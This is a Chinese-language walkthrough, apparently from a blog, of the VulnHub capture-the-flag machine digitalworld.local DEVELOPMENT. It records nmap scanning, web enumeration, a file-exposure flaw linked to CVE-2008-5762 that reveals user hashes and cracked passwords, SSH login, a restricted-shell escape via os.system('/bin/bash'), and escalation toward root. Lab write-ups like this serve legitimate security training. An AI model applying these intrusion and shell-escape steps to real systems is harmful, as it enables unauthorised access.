vulnhub靶场之digitalworld.local DEVELOPMENT

一.环境搭建

1.靶场描述

This machine reminds us of a DEVELOPMENT environment: misconfigurations rule the roost. This is designed for OSCP practice, and the original version of the machine was used for a CTF. It is now revived, and made slightly more nefarious than the original.

If you MUST have hints for this machine (even though they will probably not help you very much until you root the box!): Development is (#1): different from production, (#2): a mess of code, (#3): under construction.

Note: Some users report the box may seem to be "unstable" with aggressive scanning. The homepage gives a clue why.

Feel free to contact the author at https://donavan.sg/blog if you would like to drop a comment.

2.靶场下载

https://download.vulnhub.com/digitalworld/devt-improved.7z

3.靶场启动

二.信息收集

1.寻找靶场真实的ip地址

nmap -sP 192.168.239.0/24

arp-scan -l

靶场IP地址为192.168.239.131

2.探测端口及服务

nmap -p- -sV http://192.168.239.131

开启了22,113,139,445,8080端口,还有smb服务

三.渗透测试

1.访问web服务

http://192.168.239.131:8080

我们看到一串英文,我们进行翻译,让我们访问html_pages页面

http://192.168.239.131:8080/html_pages

我们可以看到好多的目录

我们访问发现是一串二进制,没有什么用

http://192.168.239.131:8080/development.html

提示我们有一个名字是hackersecretpage,然后我们查看源代码,发现一个新的目录

我们进行访问,发现是一个登录页面,我们进行查看

2.渗透测试

1)登录页面

http://192.168.239.131:8080/developmentsecretpage/patrick.php?logout=1

我们输入admin:123456,发现报错了,我们进行查看

我们查看这个slogin_lib.inc.php目录

发现是CVE-2008-5762有关,可以导致远程文件包含,最主要的是slog_users.txt文件

2)远程文件包含

http://192.168.239.131:8080/developmentsecretpage/slog_users.txt

可以看到4个用户名和密码,我们进行查看

复制代码
admin, 3cb1d13bb83ffff2defe8d1443d3a0eb——————解密不出来
intern, 4a8a2b374f463b7aedbb44a066363b81——————12345678900987654321
patrick, 87e6d56ce79af90dbe07d387d3d0579e——————P@ssw0rd25
qiu, ee64497098d0926d198f54f6d5431f98——————————qiu

我们进行ssh登录

3)ssh登录

ssh intern@192.168.239.131

最后只有intern可以登录

echo os.system('/bin/bash')

3)权限提升

我们可以看到2个文件,我们进行查看

提示我们切换到patrick用户,我们进行切换

su patrick

我们进行提权

我们可以看到权限是root权限,我们查看flag

相关推荐
2301_780789661 天前
边缘节点 DDoS 防护:CDN 节点的流量清洗与就近拦截方案
安全·web安全·ddos
观北海2 天前
网络安全蓝队常用工具全景与实战指南
安全·web安全
人衣aoa2 天前
PG靶机 - Pelican
web安全·网络安全·渗透测试·内网渗透
lingggggaaaa2 天前
小迪安全v2023学习笔记(六十一讲)—— 持续更新中
笔记·学习·安全·web安全·网络安全·反序列化
峥嵘life2 天前
Android 欧盟网络安全EN18031 要求对应的基本表格填写
android·安全·web安全
挨踢攻城2 天前
IT资讯 | VMware ESXi高危漏洞影响国内服务器
安全·web安全·网络安全·vmware·虚拟化技术·厦门微思网络·vmware esxi高危漏洞
菜根Sec3 天前
Sqli-labs靶场搭建及报错处理
web安全·网络安全·渗透测试·sql注入·网络安全靶场
小韩博3 天前
网络安全(Java语言)简单脚本汇总 (一)
java·安全·web安全
曼岛_4 天前
[系统架构设计师]信息安全技术基础知识(三)
网络·web安全·系统架构
Bruce_Liuxiaowei4 天前
PHP伪协议详解:网络安全中的利用与防御
网络·web安全·php